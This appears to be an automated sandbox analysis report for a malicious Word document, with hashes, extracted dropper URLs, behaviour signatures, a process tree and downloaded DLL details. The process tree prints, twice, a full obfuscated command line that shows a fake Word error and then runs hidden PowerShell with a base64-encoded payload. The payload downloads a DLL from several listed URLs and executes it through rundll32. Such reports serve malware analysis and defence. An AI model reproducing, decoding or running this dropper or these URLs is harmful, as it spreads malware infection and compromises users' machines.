Analysis

  • max time kernel
    140s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    12-01-2021 22:20

General

  • Target

    Document.doc

  • Size

    103KB

  • MD5

    02e5d621d2408c162ebb433af6838c97

  • SHA1

    0941bfe53d719ae6c3defef2e496d8feb9bd7a74

  • SHA256

    1354c26e824658ca3c3536bce77219b5faf70fe5faf8a9c6dbdb3a026f7fae54

  • SHA512

    472ba777f04d0bb57b5d6a9f588b6769268cdc28c74bca42f044e50cdd5caaf3e96090146e484cceb61defdcd2881399bd378249508ffb067e6a3bd6b7dcb0d9

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://angel2gether.de/BlutEngel/SpeechEngines/

exe.dropper

http://holonchile.cl/cgi-bin/System32/

exe.dropper

http://members.nlbformula.com/cgi-bin/Microsoft.NET/

exe.dropper

http://akybron.hu/wordpress/Triedit/

exe.dropper

https://norailya.com/drupal/4zKMm/

exe.dropper

http://giannaspsychicstudio.com/cgi-bin/Systems/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Document.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:648
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1492
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:3644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAgACQAbAB1AE4AOQBjAFgAPQBbAHQAWQBwAGUAXQAoACIAewAyAH0AewAwAH0AewAzAH0AewA0AH0AewAxAH0AIgAgAC0ARgAnAEUATQAuAEkATwAnACwAJwB5ACcALAAnAFMAWQBzAFQAJwAsACcALgBEAEkAcgBFAEMAVAAnACwAJwBPAHIAJwApACAAOwAgACAAUwBlAHQAIAAgACgAJwBMADQAYQAnACsAJwBIACcAKQAgACgAWwBUAHkAUABlAF0AKAAiAHsANgB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsANwB9AHsANQB9AHsAMwB9ACIAIAAtAGYAJwBFACcALAAnAEUAdAAuAFMARQByAFYAaQBjAGUAcAAnACwAJwBUACcALAAnAGUAUgAnACwAJwBtAC4AbgAnACwAJwBBAE4AYQBnACcALAAnAFMAeQBTACcALAAnAG8AaQBuAHQAbQAnACkAIAAgACkAIAA7ACAAJABEAHAAXwBqAG0AYgB0AD0AJABFADcAOABMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABJADAANQBRADsAJABYADUANQBOAD0AKAAnAFEANAAnACsAJwA4AEsAJwApADsAIAAgACQATAB1AE4AOQBDAFgAOgA6ACIAYwBSAGAAZQBhAFQAYABFAGQASQBSAGAARQBgAGMAdABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAMAAnACsAJwB9ACcAKwAnAEwAJwArACcAbQBsADMAeABiAG4AewAwACcAKwAnAH0AVQA2AGgAdwAnACsAKAAnAGcAbAAnACsAJwBuACcAKQArACcAewAwAH0AJwApAC0AZgBbAEMAaABhAHIAXQA5ADIAKQApADsAJABDADUANQBXAD0AKAAoACcATAA4ACcAKwAnADUAJwApACsAJwBXACcAKQA7ACAAKABnAEUAVAAtAFYAYQByAEkAYQBiAEwARQAgACAAKAAnAGwANABhACcAKwAnAEgAJwApACAAIAAtAFYAYQBMAFUARQBvAG4AKQA6ADoAIgBTAGUAYwBgAFUAcgBpAHQAWQBgAHAAcgBvAHQAYABPAGMAbwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABKADAAMQBNAD0AKAAnAFMANAAnACsAJwAxAEYAJwApADsAJABYADYAbABzAGkAYgBiACAAPQAgACgAJwBMAF8AJwArACcAMgBGACcAKQA7ACQAWAA1ADQAUAA9ACgAJwBHADYAJwArACcAXwBZACcAKQA7ACQAUgA3ADIANQAzAG8AZQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AEwAJwArACgAJwBtACcAKwAnAGwAMwB4AGIAJwArACcAbgAnACkAKwAnAHsAMAAnACsAJwB9AFUANgBoAHcAZwBsACcAKwAnAG4AJwArACcAewAnACsAJwAwACcAKwAnAH0AJwApACAAIAAtAEYAIAAgAFsAQwBoAEEAcgBdADkAMgApACsAJABYADYAbABzAGkAYgBiACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABWADMAOQBZAD0AKAAnAFEANgAnACsAJwA2AEUAJwApADsAJABYAGwAdwB2AGwAaAA2AD0AKAAnAHcAJwArACcAXQAnACsAKAAnAHgAbQBbACcAKwAnAHYAOgAnACkAKwAoACcALwAvACcAKwAnAGEAJwApACsAKAAnAG4AZwAnACsAJwBlAGwAMgBnACcAKQArACgAJwBlAHQAJwArACcAaAAnACkAKwAnAGUAcgAnACsAKAAnAC4AZAAnACsAJwBlAC8AQgBsACcAKQArACcAdQB0ACcAKwAnAEUAJwArACgAJwBuAGcAZQAnACsAJwBsACcAKQArACgAJwAvAFMAcABlAGUAJwArACcAYwBoAEUAJwArACcAbgAnACkAKwAoACcAZwBpAG4AZQBzACcAKwAnAC8AQAAnACsAJwB3AF0AeABtAFsAdgA6ACcAKQArACcALwAnACsAKAAnAC8AaABvAGwAJwArACcAbwBuACcAKQArACcAYwAnACsAKAAnAGgAJwArACcAaQAnACsAJwBsAGUALgAnACsAJwBjAGwALwBjAGcAJwArACcAaQAtAGIAJwArACcAaQBuAC8AUwB5ACcAKQArACgAJwBzAHQAJwArACcAZQBtACcAKQArACgAJwAzADIAJwArACcALwBAAHcAJwApACsAKAAnAF0AJwArACcAeABtACcAKQArACgAJwBbACcAKwAnAHYAOgAnACkAKwAnAC8AJwArACcALwAnACsAKAAnAG0AZQBtAGIAZQAnACsAJwByACcAKQArACgAJwBzAC4AJwArACcAbgAnACkAKwAoACcAbABiAGYAbwAnACsAJwByAG0AdQBsACcAKwAnAGEALgBjAG8AbQAvAGMAJwArACcAZwAnACkAKwAoACcAaQAnACsAJwAtAGIAJwApACsAKAAnAGkAbgAvACcAKwAnAE0AJwApACsAKAAnAGkAYwByAG8AcwAnACsAJwBvACcAKQArACcAZgB0ACcAKwAnAC4AJwArACgAJwBOAEUAVAAnACsAJwAvACcAKwAnAEAAdwAnACkAKwAnAF0AJwArACcAeAAnACsAKAAnAG0AJwArACcAWwB2ACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAYQBrACcAKwAnAHkAJwApACsAKAAnAGIAcgAnACsAJwBvAG4AJwApACsAJwAuACcAKwAnAGgAdQAnACsAKAAnAC8AdwAnACsAJwBvACcAKQArACgAJwByACcAKwAnAGQAcAByACcAKwAnAGUAcwBzACcAKwAnAC8AVAByAGkAZQBkAGkAJwApACsAKAAnAHQALwAnACsAJwBAACcAKQArACcAdwAnACsAKAAnAF0AJwArACcAeABtAFsAdgAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwBuAG8AcgAnACsAJwBhAGkAbAAnACkAKwAoACcAeQAnACsAJwBhAC4AYwAnACkAKwAnAG8AJwArACgAJwBtACcAKwAnAC8AZAAnACsAJwByACcAKwAnAHUAcAAnACsAJwBhAGwAJwArACcALwA0AHoASwBNAG0ALwBAAHcAXQAnACsAJwB4AG0AJwApACsAKAAnAFsAJwArACcAdgAnACsAJwA6AC8ALwBnAGkAYQAnACsAJwBuAG4AYQBzACcAKQArACcAcABzACcAKwAnAHkAYwAnACsAKAAnAGgAaQAnACsAJwBjACcAKQArACgAJwBzAHQAJwArACcAdQAnACkAKwAoACcAZAAnACsAJwBpAG8AJwApACsAJwAuACcAKwAnAGMAbwAnACsAJwBtAC8AJwArACgAJwBjACcAKwAnAGcAaQAtAGIAaQAnACkAKwAoACcAbgAvACcAKwAnAFMAeQAnACkAKwAnAHMAdAAnACsAJwBlAG0AJwArACcAcwAnACsAJwAvACcAKQAuACIAUgBFAGAAcABMAGEAYABDAGUAIgAoACgAJwB3ACcAKwAoACcAXQAnACsAJwB4AG0AWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAJwArACgAJwBzAGUAJwArACcAdwBmACcAKQApACwAKAAoACcAdwBlACcAKwAnAHYAJwApACsAJwB3AGUAJwApACkALAAoACgAJwBhAGUAJwArACcAZgAnACkAKwAnAGYAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACkAWwAyAF0AKQAuACIAcwBQAEwAYABJAHQAIgAoACQAQwA1AF8ATAAgACsAIAAkAEQAcABfAGoAbQBiAHQAIAArACAAJABIADQANQBJACkAOwAkAEUAMwAyAFQAPQAoACcAQQA1ACcAKwAnADkASAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAegBfAGMANgBwADIAIABpAG4AIAAkAFgAbAB3AHYAbABoADYAKQB7AHQAcgB5AHsAKAAmACgAJwBOACcAKwAnAGUAdwAnACsAJwAtAE8AYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAWQBTAFQARQBtAC4AbgBFAFQALgBXAEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGAARgBpAGwAZQAiACgAJABMAHoAXwBjADYAcAAyACwAIAAkAFIANwAyADUAMwBvAGUAKQA7ACQAVwAwADIAQgA9ACgAKAAnAE0ANgAnACsAJwAyACcAKQArACcAVQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAUgA3ADIANQAzAG8AZQApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA5ADAANwAyACkAIAB7ACYAKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFIANwAyADUAMwBvAGUALAAoACcAUwAnACsAKAAnAGgAJwArACcAbwB3ACcAKQArACcARABpACcAKwAoACcAYQAnACsAJwBsAG8AZwBBACcAKQApAC4AIgBUAG8AcwB0AFIAYABJAGAATgBHACIAKAApADsAJABLAF8AMgBBAD0AKAAnAEwAMAAnACsAJwAxAEgAJwApADsAYgByAGUAYQBrADsAJABDADcAXwBHAD0AKAAoACcAQgAnACsAJwAxADQAJwApACsAJwBMACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwAzADEARgA9ACgAJwBJAF8AJwArACcAMgBDACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3648
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3068
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:3884
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ckdkrtgyxmpo\meihjafessk.vxk",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:2924

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • \Users\Admin\Lml3xbn\U6hwgln\L_2F.dll
      MD5

      238a0e860a00ea4cc8ee2af05f2fbddf

      SHA1

      9df6ff60eab437a31d0a2117d25663ca6a2f7b73

      SHA256

      8d750274a3d5721322603b3bb296cc039990b91a9bd2776ed662e0cf70335c24

      SHA512

      c6a3156ff5efe5fc53962fd1e0e1f1f561a729569656b4e590032ac53d7b0c7c719859e203cfe2d2b39fc29267132c1f6557272243e5c2aaec7a556dadd38210

    • memory/648-2-0x000002042EA70000-0x000002042F0A7000-memory.dmp
      Filesize

      6.2MB

    • memory/2924-12-0x0000000000000000-mapping.dmp
    • memory/3068-8-0x0000000000000000-mapping.dmp
    • memory/3644-3-0x0000000000000000-mapping.dmp
    • memory/3648-4-0x0000000000000000-mapping.dmp
    • memory/3648-5-0x00007FF9DCF00000-0x00007FF9DD8EC000-memory.dmp
      Filesize

      9.9MB

    • memory/3648-6-0x0000019E846F0000-0x0000019E846F1000-memory.dmp
      Filesize

      4KB

    • memory/3648-7-0x0000019E9CB10000-0x0000019E9CB11000-memory.dmp
      Filesize

      4KB

    • memory/3884-10-0x0000000000000000-mapping.dmp